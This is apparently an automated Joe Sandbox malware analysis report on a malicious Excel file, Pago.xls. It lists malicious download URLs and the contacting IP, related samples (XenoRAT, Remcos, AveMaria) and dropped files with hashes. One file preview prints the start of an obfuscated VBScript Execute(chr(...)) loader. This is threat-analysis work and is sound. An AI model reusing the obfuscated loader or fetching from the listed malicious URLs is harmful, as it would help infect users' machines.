                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrFwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjwscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfxwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.stipamana.com/exgdhfyjhydswscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/dowscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgxwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/eiiwscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.swscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhwscript.exe, 00000004.00000003.380935324.0000000000323000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfwscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/wwwscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknNwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhywscript.exe, 00000004.00000002.380993511.00000000002FE000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhawscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwewscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknds$wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://github.com/syohex/java-simple-mine-sweeperC:NXRWIG.exe, 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, NXRWIG.exe, 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqkwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgtwscript.exe, 00000004.00000003.380905057.0000000000357000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://secure.comodo.com/CPS0wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.stipamana.cwscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjgwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://crl.entrust.net/2048ca.crl0wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjqwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/dwscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381085396.00000000037C4000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          87.121.86.205
                                          		www.stipamana.comBulgaria
                                          		34577SKATTV-ASBGfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1575112
                                          Start date and time:2024-12-14 13:50:53 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 20s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:15
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • GSI enabled (VBA)
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Pago.xls
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winXLS@10/17@4/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 65%
                                          • Number of executed functions: 20
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Found application associated with file extension: .xls
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          07:51:54API Interceptor48x Sleep call for process: wscript.exe modified
                                          07:53:02API Interceptor3x Sleep call for process: NXRWIG.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          87.121.86.205yIla7SeJ6r.docGet hashmaliciousXenoRATBrowse
                                            Outstanding_Payment.vbsGet hashmaliciousUnknownBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.stipamana.comEstado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              tqkdMdv2zO.docGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.57
                                              gMqBZfJ5Mq.exeGet hashmaliciousLokibotBrowse
                                              • 94.156.167.55
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.55
                                              Estado_de_cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 94.156.167.57
                                              plb2ptcqcI.docGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.57
                                              TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                              • 94.156.167.57
                                              TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                              • 94.156.167.57

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              SKATTV-ASBGyIla7SeJ6r.docGet hashmaliciousXenoRATBrowse
                                              • 87.121.86.205
                                              Outstanding_Payment.vbsGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • 87.121.86.105
                                              RHxJqGoGFB.exeGet hashmaliciousSalityBrowse
                                              • 94.156.127.59
                                              yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                              • 87.121.86.8
                                              https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                              • 87.121.86.72
                                              http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkveGet hashmaliciousUnknownBrowse
                                              • 87.121.86.72
                                              [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.emlGet hashmaliciousUnknownBrowse
                                              • 87.121.86.72
                                              o4QEzeCniw.exeGet hashmaliciousUnknownBrowse
                                              • 87.120.237.130
                                              Payment Order #00004647.exeGet hashmaliciousXWormBrowse
                                              • 87.121.86.8

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              05af1f5ca1b87cc9cc9b25185115607dNB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              rcNDmdah2W.docGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              CMR ART009.docxGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                              • 87.121.86.205
                                              Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              510005940.docx.docGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              invoice09850.xlsGet hashmaliciousRemcosBrowse
                                              • 87.121.86.205
                                              Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                              • 87.121.86.205
                                              7dcce5b76c8b17472d024758970a406bNB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              PyrNUtAUkw.docxGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              CMR ART009.docxGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                              • 87.121.86.205
                                              Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                              • 87.121.86.205
                                              SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              510005940.docx.docGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205
                                              Document.xlaGet hashmaliciousUnknownBrowse
                                              • 87.121.86.205

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cfhxdfhgjsxgfhxz[1].vbs

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with very long lines (10230), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):10232
                                              Entropy (8bit):4.211783367688683
                                              Encrypted:false
                                              SSDEEP:96:K2uOO/DTYHkGihu1BAbYm3ts/chhS3y+KdkZ91eJ/GhsSwI1taYjFCWCtcrQbAyj:ADDSTuO6hOu271OrhI1kyCccREU
                                              MD5:6990D9879DEA656A60AFCA23413F9FDF
                                              SHA1:07BF9A3E010A8B086743428049928BE6025F7441
                                              SHA-256:EF0B46E9141A7691C1C9E2F882801BB7B42758D40E6B29D894E67D5F09270724
                                              SHA-512:A1012437567F38A7CE664FDE76E6DA04B5FBC704829180B4AE0E0F5898C22D4207223D81CD6D38A3AEDE09156D384FF6A6B1C7E7D511A5E18E0977DEF4E62FAA
                                              Malicious:true
                                              Reputation:low
                                              Preview:Execute(chr(6225/75)& chr(154-53)& chr(10440/90)& chr(127-95)& chr(73+38)& chr(169-71)& chr(13+93)& chr(25+62)& chr(1260/12)& chr(36+74)& chr(145-73)& chr(66+50)& chr(61+55)& chr(206-94)& chr(59-27)& chr(100-39)& chr(99-67)& chr(85-18)& chr(100+14)& chr(8181/81)& chr(3298/34)& chr(4*29)& chr(185-84)& chr(43+36)& chr(4606/47)& chr(21+85)& chr(6+95)& chr(192-93)& chr(2*58)& chr(12+28)& chr(2312/68)& chr(101-14)& chr(182-77)& chr(2750/25)& chr(1944/27)& chr(10092/87)& chr(177-61)& chr(94+18)& chr(12+34)& chr(1392/16)& chr(37+68)& chr(198-88)& chr(106-34)& chr(10672/92)& chr(54+62)& chr(1008/9)& chr(10+72)& chr(71+30)& chr(147-34)& chr(28+89)& chr(4646/46)& chr(115*1)& chr(69+47)& chr(109-63)& chr(-36+89)& chr(3818/83)& chr(107-58)& chr(136/4)& chr(3+38)& chr(-33+43)& chr(12+73)& chr(21+61)& chr(4332/57)& chr(1856/58)& chr(105-44)& chr(131-99)& chr(-59+93)& chr(35+69)& chr(86+30)& chr(164-48)& chr(81+31)& chr(103+12)& chr(2726/47)& chr(2773/59)& chr(13+34)& chr(54+65)& chr(98+21)& chr(65+5

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exe

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):395776
                                              Entropy (8bit):6.292758889650956
                                              Encrypted:false
                                              SSDEEP:6144:y3w+J2qEjOEDBOOloZON3RZDI6Yv3bK1UAnkPrI5SM3UdjnldjfzaYHapYd:yR2q0DMODN3RZDIZ3bYkPrIBEdTa6
                                              MD5:3871A95491C97785A2CBA0C068A9ED4E
                                              SHA1:B304DD40686538DEB24184729623D572DEEC57FB
                                              SHA-256:51D0B96C358A0FE55BB6A60970CEF3EFA0EC20CDAB01B4DC03DF4928D6A585BD
                                              SHA-512:1E2200B86CB9AA7467B19E31CAA148C6A8086F97AC8E326F3CEF79629BBEA50AE8070B8A6BCAC24AD55049E64DABF8C73B75284D0C14AE4EC224705E6137DF5C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[g..............P.................. ........@.. .......................`............`.....................................O.... .......................@......d................................................ ............... ..H............text...4.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............e......D......H...........................................*....(....*2.....(.....*.s.........s.........s.........s.........s.........*.0...........~....o........8........*....0...........~....o........8........*....0...........~....o........8........*....0...........~....o........8........*....0...........~....o........8........*....0....................9..............o....8.... ............9....~...............9....~.........(....o............9.... .........%..

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{48F992B6-FE2A-4853-ADAB-791E09B96F34}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BB7DF04E1B0A2570657527A7E108AE23
                                              SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                              SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                              SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{02E30392-53AC-4694-A8D2-6A5112F44DE3}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\ .doc

                                              Download File
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal.dotm, Last Saved By: oplup, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Dec 14 08:47:00 2024, Last Saved Time/Date: Sat Dec 14 08:47:00 2024, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
                                              Category:dropped
                                              Size (bytes):37888
                                              Entropy (8bit):4.182696331742761
                                              Encrypted:false
                                              SSDEEP:384:wRWpiSY5Ugbjr+6dl1cf/tr/j9fS60jkf4R:N72Oftld58
                                              MD5:B46F63CCDDDF1968E5B65F0FFBE9246B
                                              SHA1:37A4EC154E6FA0D4D88AB57F3B8FEDD364D27F78
                                              SHA-256:F28940AC5F587D2C947EC5DE426113B01FC6C292C0376B727F13FB1AF40DBB33
                                              SHA-512:93A2BC0E715849FB53EE5A168030FE6314A789F6203B144775230B0AFACF46FB3A98B84EBAD92831076EF1EBEA453D30114C4A4856D2FBE0497020D5AF6B4068
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................_.............................bjbj,E,E..........................N/..N/....................................................................................6.......6...........................................................................................................!...f.......................................................................................................................$...........9...>.........................................................................

                                              C:\Users\user\AppData\Local\Temp\~$ .doc

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020303
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyRyaSiuW3hWRUbilfln:vdsCkWta5RJhhbidl
                                              MD5:CA9570952A5F48F847628233AB5AB2D4
                                              SHA1:109750BB54BEFE801619BFE33AFE1BA2DCC152AB
                                              SHA-256:35BC7B00A750EC0D7066E16C7A8021E46EB3E4937D83FC67F47AF3AEC99135EC
                                              SHA-512:0749A18934BD44BB05B250FF0FBC8F4630B0767F650CEDFCDF8C44E6E1EE8E3F250AB254F3F622F88A61EBA6FAA7F2138F6507441ACC4057652B93C2B0C50EE9
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              C:\Users\user\AppData\Local\Temp\~DF577A8C205909C03A.TMP

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BB7DF04E1B0A2570657527A7E108AE23
                                              SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                              SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                              SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\~DF7352C8627ED81EF0.TMP

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\~DFD2C6BB3DAFA82CD1.TMP

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):28672
                                              Entropy (8bit):3.635493283618473
                                              Encrypted:false
                                              SSDEEP:768:Jj+o8xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAK0PtPll9UQ:YVxEtjPOtioVjDGUU1qfDlaGGx+cL2Qa
                                              MD5:E22A88409098D61E82C185FC9EB527FB
                                              SHA1:1C9849575E825F2271CE800E958E1598BDDAFAA1
                                              SHA-256:E8E55B0D83E961AF10E2C6ABFD01DDB54AE0AAA8565A61B96FADF95C3BB237A0
                                              SHA-512:58DA0F9989A0DEC7F78188CB84163B015425C6812DB75D8208719167D56BABE97EDDC6B06C2C296EB1128EC140F182EC6A29B57C6C1091BF87C5A8FF3794B248
                                              Malicious:false
